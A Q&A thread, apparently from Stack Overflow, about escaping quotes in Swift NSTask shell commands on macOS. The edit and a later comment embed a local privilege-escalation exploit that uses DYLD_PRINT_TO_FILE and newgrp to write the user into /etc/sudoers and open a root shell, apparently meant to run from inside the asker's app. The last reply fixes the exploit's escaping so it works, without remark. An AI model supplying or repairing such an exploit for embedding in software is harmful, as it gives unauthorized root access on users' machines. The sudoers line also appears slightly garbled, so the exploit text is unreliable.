# How do I fix this Swift code?

Tags: swift, macos

I am currently working on an app in Xcode 7.1.1. I would like to run the following Swift code:

```
else if floor(kCFCoreFoundationVersionNumber) > kCFCoreFoundationVersionNumber10_10 {
        let task = NSTask()
        task.launchPath = "/bin/bash"
        task.arguments = ["-c",
            "osascript -e 'display notification "Your operating system is incompatable" with title "Error"'"]
        task.launch()
        }
```

This should run the `oascript`command if the user is running anything newer than Yosemite. The problem is that I get unresolved identifier and expected separator errors. If I make the Xcode recommended corrections, the command will no longer work. Is there any workaround in Xcode 7?

Edit:
A similar problem just came up when I tried to say `"echo 'echo "$(whoami) ALL=(ALL) ALL-" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s"]` This time I also get unresolved identifier errors and expected separator errors. Is there a way to fix this? Sorry if these are dumb questions, this is my first app.

Comment: The literal answer to the title of your question is "you can't ignore errors".  (...other than by shutting down Xcode and doing something else instead, I guess. :)  )

Comment: On a side note, maybe you should look at using `NSUserNotification` and `NSUserNotificationCenter` instead of using Apple Script to show notifications on the mac.

Answer (score 1, accepted):

Problem with double quotes, try replacing line

```
task.arguments = ["-c",
            "osascript -e 'display notification "Your operating system is incompatable" with title "Error"'"]
```

with

```
task.arguments = ["-c",
        "osascript -e 'display notification \"Your operating system is incompatable\" with title \"Error\"'"]
```

Comment: Thanks! A similar problem just came up when I tried to say `"echo 'echo "$(whoami) ALL=(ALL) ALL-" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s"]` This time I also get unresolved identifier errors and expected separator errors. Is there a way to fix this? Sorry if these are dumb questions, this is my first app.

Comment: Same issue here as well. try "echo 'echo \"$(whoami) ALL=(ALL) ALL-\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s"